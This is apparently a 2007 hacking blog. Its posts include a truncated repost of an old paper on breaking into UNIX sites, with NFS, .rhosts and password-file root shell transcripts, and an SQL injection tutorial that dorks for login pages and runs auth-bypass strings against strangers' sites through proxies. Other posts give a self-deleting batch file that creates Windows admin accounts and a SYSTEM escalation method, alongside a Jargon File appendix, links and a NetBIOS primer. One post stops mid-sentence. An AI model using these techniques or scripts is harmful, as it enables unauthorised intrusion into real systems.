Friday, November 16, 2007

Improving the Security of Your Site by Breaking Into it

Introduction

------------



Every day, all over the world, computer networks and hosts are being

broken into. The level of sophistication of these attacks varies

widely; while it is generally believed that most break-ins succeed due

to weak passwords, there are still a large number of intrusions that use

more advanced techniques to break in. Less is known about the latter

types of break-ins, because by their very nature they are much harder to

detect.



-----



CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .

Purdue. Sun. You name it, we've seen it broken into. Anything that is

on the Internet (and many that isn't) seems to be fairly easy game. Are

these targets unusual? What happened?



Fade to...



A young boy, with greasy blonde hair, sitting in a dark room. The room

is illuminated only by the luminescense of the C64's 40 character

screen. Taking another long drag from his Benson and Hedges cigarette,

the weary system cracker telnets to the next faceless ".mil" site on his

hit list. "guest -- guest", "root -- root", and "system -- manager" all

fail. No matter. He has all night... he pencils the host off of his

list, and tiredly types in the next potential victim...



This seems to be the popular image of a system cracker. Young,

inexperienced, and possessing vast quantities of time to waste, to get

into just one more system. However, there is a far more dangerous type

of system cracker out there. One who knows the ins and outs of the

latest security auditing and cracking tools, who can modify them for

specific attacks, and who can write his/her own programs. One who not

only reads about the latest security holes, but also personally

discovers bugs and vulnerabilities. A deadly creature that can both

strike poisonously and hide its tracks without a whisper or hint of a

trail. The uebercracker is here.



-----



Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's

uebermensch, or, literally translated into English, "over man."

Nietzsche used the term not to refer to a comic book superman, but

instead a man who had gone beyond the incompetence, pettiness, and

weakness of the everyday man. The uebercracker is therefore the system

cracker who has gone beyond simple cookbook methods of breaking into

systems. An uebercracker is not usually motivated to perform random

acts of violence. Targets are not arbitrary -- there is a purpose,

whether it be personal monetary gain, a hit and run raid for

information, or a challenge to strike a major or prestigious site or

net.personality. An uebercracker is hard to detect, harder to stop, and

hardest to keep out of your site for good.



Overview

--------



In this paper we will take an unusual approach to system security.

Instead of merely saying that something is a problem, we will look

through the eyes of a potential intruder, and show _why_ it is one. We

will illustrate that even seemingly harmless network services can become

valuable tools in the search for weak points of a system, even when

these services are operating exactly as they are intended to.



In an effort to shed some light on how more advanced intrusions occur,

this paper outlines various mechanisms that crackers have actually used

to obtain access to systems and, in addition, some techniques we either

suspect intruders of using, or that we have used ourselves in tests or

in friendly/authorized environments.



Our motivation for writing this paper is that system administrators are

often unaware of the dangers presented by anything beyond the most

trivial attacks. While it is widely known that the proper level of

protection depends on what has to be protected, many sites appear to

lack the resources to assess what level of host and network security is

adequate. By showing what intruders can do to gain access to a remote

site, we are trying to help system administrators to make _informed_

decisions on how to secure their site -- or not. We will limit the

discussion to techniques that can give a remote intruder access to a

(possibly non-interactive) shell process on a UNIX host. Once this is

achieved, the details of obtaining root privilege are beyond the scope

of this work -- we consider them too site-dependent and, in many cases,

too trivial to merit much discussion.



We want to stress that we will not merely run down a list of bugs or

security holes -- there will always be new ones for a potential attacker

to exploit. The purpose of this paper is to try to get the reader to

look at her or his system in a new way -- one that will hopefully afford

him or her the opportunity to _understand_ how their system can be

compromised, and how.



We would also like to reiterate to the reader that the purpose of this

paper is to show you how to test the security of your own site, not how

to break into other people's systems. The intrusion techniques we

illustrate here will often leave traces in your system auditing logs --

it might be constructive to examine them after trying some of these

attacks out, to see what a real attack might look like. Certainly other

sites and system administrators will take a very dim view of your

activities if you decide to use their hosts for security testing without

advance authorization; indeed, it is quite possible that legal action

may be pursued against you if they perceive it as an attack.



There are four main parts to the paper. The first part is the

introduction and overview. The second part attempts to give the reader

a feel for what it is like to be an intruder and how to go from knowing

nothing about a system to compromising its security. This section goes

over actual techniques to gain information and entrance and covers basic

strategies such as exploiting trust and abusing improperly configured

basic network services (ftp, mail, tftp, etc.) It also discusses

slightly more advanced topics, such as NIS and NFS, as well as various

common bugs and configuration problems that are somewhat more OS or

system specific. Defensive strategies against each of the various

attacks are also covered here.



The third section deals with trust: how the security of one system

depends on the integrity of other systems. Trust is the most complex

subject in this paper, and for the sake of brevity we will limit the

discussion to clients in disguise.



The fourth section covers the basic steps that a system administrator

may take to protect her or his system. Most of the methods presented

here are merely common sense, but they are often ignored in practice --

one of our goals is to show just how dangerous it can be to ignore basic

security practices.



Case studies, pointers to security-related information, and software are

described in the appendices at the end of the paper.



While exploring the methods and strategies discussed in this paper we we

wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in

shell, perl, expect and C, it examines a remote host or set of hosts and

gathers as much information as possible by remotely probing NIS, finger,

NFS, ftp and tftp, rexd, and other services. This information includes

the presence of various network information services as well as

potential security flaws -- usually in the form of incorrectly setup or

configured network services, well-known bugs in system or network

utilities, or poor or ignorant policy decisions. It then can either

report on this data or use an expert system to further investigate any

potential security problems. While SATAN doesn't use all of the methods

that we discuss in the paper, it has succeeded with ominous regularity

in finding serious holes in the security of Internet sites. It will be

posted and made available via anonymous ftp when completed; Appendix A

covers its salient features.



Note that it isn't possible to cover all possible methods of breaking

into systems in a single paper. Indeed, we won't cover two of the most

effective methods of breaking into hosts: social engineering and

password cracking. The latter method is so effective, however, that

several of the strategies presented here are geared towards acquiring

password files. In addition, while windowing systems (X, OpenWindows,

etc.) can provide a fertile ground for exploitation, we simply don't

know many methods that are used to break into remote systems. Many

system crackers use non-bitmapped terminals which can prevent them from

using some of the more interesting methods to exploit windowing systems

effectively (although being able to monitor the victim's keyboard is

often sufficient to capture passwords). Finally, while worms, viruses,

trojan horses, and other malware are very interesting, they are not

common (on UNIX systems) and probably will use similar techniques to the

ones we describe in this paper as individual parts to their attack

strategy.



Gaining Information

-------------------



Let us assume that you are the head system administrator of Victim

Incorporated's network of UNIX workstations. In an effort to secure

your machines, you ask a friendly system administrator from a nearby

site (evil.com) to give you an account on one of her machines so that

you can look at your own system's security from the outside.



What should you do? First, try to gather information about your

(target) host. There is a wealth of network services to look at:

finger, showmount, and rpcinfo are good starting points. But don't stop

there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,

and as many other services as you can find. There are so many methods

and techniques that space precludes us from showing all of them, but we

will try to show a cross-section of the most common and/or dangerous

strategies that we have seen or have thought of. Ideally, you would

gather such information about all hosts on the subnet or area of attack

-- information is power -- but for now we'll examine only our intended

target.



To start out, you look at what the ubiquitous finger command shows you

(assume it is 6pm, Nov 6, 1993):



victim % finger @victim.com

[victim.com]

Login Name TTY Idle When Where

zen Dr. Fubar co 1d Wed 08:00 death.com



Good! A single idle user -- it is likely that no one will notice if you

actually manage to break in.



Now you try more tactics. As every finger devotee knows, fingering "@",

"0", and "", as well as common names, such as root, bin, ftp, system,

guest, demo, manager, etc., can reveal interesting information. What

that information is depends on the version of finger that your target is

running, but the most notable are account names, along with their home

directories and the host that they last logged in from.



To add to this information, you can use rusers (in particular with the

-l flag) to get useful information on logged-in users.



Trying these commands on victim.com reveals the following information,

presented in a compressed tabular form to save space:



Login Home-dir Shell Last login, from where

----- -------- ----- ----------------------

root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com

bin /bin Never logged in

nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co

daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com

sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com

zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com

sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com

guest /export/foo /bin/sh Never logged in

ftp /home/ftp Never logged in



Both our experiments with SATAN and watching system crackers at work

have proved to us that finger is one of the most dangerous services,

because it is so useful for investigating a potential target. However,

much of this information is useful only when used in conjunction with

other data.



For instance, running showmount on your target reveals:



evil % showmount -e victim.com

export list for victim.com:

/export (everyone)

/var (everyone)

/usr easy

/export/exec/kvm/sun4c.sunos.4.1.3 easy

/export/root/easy easy

/export/swap/easy easy



Note that /export/foo is exported to the world; also note that this is

user guest's home directory. Time for your first break-in! In this

case, you'll mount the home directory of user "guest." Since you don't

have a corresponding account on the local machine and since root cannot

modify files on an NFS mounted filesystem, you create a "guest" account

in your local password file. As user guest you can put an .rhosts entry

in the remote guest home directory, which will allow you to login to the

target machine without having to supply a password.



evil # mount victim.com:/export/foo /foo

evil # cd /foo

evil # ls -lag

total 3

1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .

1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..

1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest

evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd

evil # ls -lag

total 3

1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .

1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..

1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest

evil # su guest

evil % echo evil.com >> guest/.rhosts

evil % rlogin victim.com

Welcome to victim.com!

victim %



If, instead of home directories, victim.com were exporting filesystems

with user commands (say, /usr or /usr/local/bin), you could replace a

command with a trojan horse that executes any command of your choice.

The next user to execute that command would execute your program.



We suggest that filesystems be exported:



o Read/write only to specific, trusted clients.

o Read-only, where possible (data or programs can often be

exported in this manner.)



If the target has a "+" wildcard in its /etc/hosts.equiv (the default in

various vendor's machines) or has the netgroups bug (CERT advisory

91:12), any non-root user with a login name in the target's password

file can rlogin to the target without a password. And since the user

"bin" often owns key files and directories, your next attack is to try

to log in to the target host and modify the password file to let you

have root access:



evil % whoami

bin

evil % rsh victim.com csh -i

Warning: no access to tty; thus no job control in this shell...

victim % ls -ldg /etc

drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc

victim % cd /etc

victim % mv passwd pw.old

victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd

victim % ^D

evil % rlogin victim.com -l toor

Welcome to victim.com!

victim #



A few notes about the method used above; "rsh victim.com
Posted by at 11 comments:

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


WHAT I DO :

first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting


*******************************************

WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your actions...do the right thing and let admins know ay

******************************************
Posted by at 4 comments:

Saturday, October 27, 2007

Helping Hacker Culture Grow

If you enjoyed the Jargon File, please help the culture that created it grow and flourish. Here are several ways you can help:

* If you are a writer or journalist, don't say or write hacker when you mean cracker. If you work with writers or journalists, educate them on this issue and push them to do the right thing. If you catch a newspaper or magazine abusing the work `hacker', write them and straigten them out (this appendix includes a model letter).

* If you're a techie or computer hobbyist, get involved with one of the free Unixes. Toss out that lame Microsoft OS, or confine it to one disk partition and put Linux or FreeBSD or NetBSD on the other one. And the next time your friend or boss is thinking about some commercial software `solution' that costs more than it's worth, be ready to blow the competition away with free software running over i free Unix.

* Contribute to organizations like the Free Software Foundation that promote the production of high-quality free software. You can reach the Free Software Foundation at gnu@prep.ai.mit.edu, by phone at +1-617-542-5942, or by snail-mail at 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.

* Support the League for Programming Freedom, which opposes over-broad software patents that constantly threaten to blow up in hackers' faces, preventing them from developing innovative software for tomorrow's needs. You can reach the League for Programming Freedom at lpf@uunet.uu.net. by phone at +1 617 621 7084, or by snail-mail at 1 Kendall Square #143, P.O.Box 9171, Cambridge, Massachusetts 02139 USA.

* If you do nothing else, please help fight government attempts to seize political control of Internet content and restrict strong cryptography. As TNHD III went to press, the so-called `Communications Decency Act' had just been declared "unconstitutional on its face" by a Federal court, but the government is expected to appeal. If it's still law when you read this, please join the effort by the Citizens' Internet Empowerment Coalition lawsuit to have the CDA quashed or repealed. Surf to the Center for Democracy and technology's home page at http://www.cdt.org to see what you can do to help fight censorship of the net.

Here's the text of a letter RMS wrote to the Wall Street Journal to complain about their policy of using "hacker" only in a pejorative sense. We hear that most major newspapers have the same policy. If you'd like to help change this situation, send your favorite newspaper the same letter -- or, better yet, write your own letter.

Dear Editor:

This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.

I am a hacker. That is to say, I enjoy playing with computers -- working with, learning about, and writing clever computer programs. I am not a cracker; I don't make a practice of breaking computer security.

There's nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I'm admitting something naughty -- because newspapers such as yours misuse the word "hacker", giving the impression that it means "security breaker" and nothing else. You are giving hackers a bad name.

The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between "hacker" and "security breaker". They know how to make the distinction, but you don't let them! You insist on using "hacker" pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.

Of course, you have a reason. You say that readers have become used to your insulting usage of "hacker", so that you cannot change it now. Well, you can't undo past mistakes today; but that is no excuse to repeat them tomorrow.

If I were what you call a "hacker", at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don't do that kind of thing! I have enough computers to play with at home and at work; I don't need yours. Besides, it's not my way to respond to insults with violence. My response is this letter.

You owe hackers an apology; but more than that, you owe us ordinary respect.

Sincerely, etc.
Posted by at 2 comments:

Monday, September 3, 2007

some links

http://www.showmyip.com/
http://sainathgupta-hacking.blogspot.com/
http://www.securitytaskforce.org/
http://www.blackhat.com/
http://www.blackhat.com/html/bh-usa-06/bh-usa-06-speakers.html
http://www.nag.co.in/ncise.htm
http://www.wtcs.org/snmp4tpc/freeware.htm
http://www.wireshark.org/
http://www.grc.com/default.htm
http://www.thinkdigit.com/index.php?action=pro_how_to&prodid=679
http://www.snort.org/
http://prasadswork.blogspot.com/
http://crack0hack.wetpaint.com/?t=anon
http://www.discoverhacking.c-o.in/
http://crack0hack.wetpaint.com/page/Best+Hacking+Softwares_+1000sw%28Free+download%29
http://www.remote-exploit.org/backtrack_download.html
http://crack0hack.wetpaint.com/rss2_0/pageReport/created?t=anon
Posted by at 5 comments:

Thursday, August 30, 2007

Hack admin from xp guest account(Thats possible )

Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


~ Cheers ~



* Haking "admin" from "user" mode n more



really that is possible !

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:


You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.


Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.


Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe



A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu


explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.





ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.


EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Enjoy
Posted by at 1 comment:

Monday, August 27, 2007

NetBios Basic Tutorial !

I bet u wanna try ur hands on Ethical Hacking but unaware of Basic NetBios, which stands as a very important aspect. n dis is d best explanation i can offer u, written in much simpler language.
~cheers~


Preface to NetBIOS

Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.

Whats is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.

NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.

It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.

NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.

PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.

All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.

NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.

In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.

NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.

When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:

1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.

2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.

3. If no other client on the network objects to the name registration, the client will finish the registration process.

There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.

The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.

[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]

The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.

Name Number Type Usage
==========================================================================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0

For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:

nbtstat -A [ipaddress]
nbtstat -a [host]

NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.

The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.

Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.

NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
Posted by at No comments:

Some tool names

Hackers tools a reference ! BEWARE !!

AAh!!

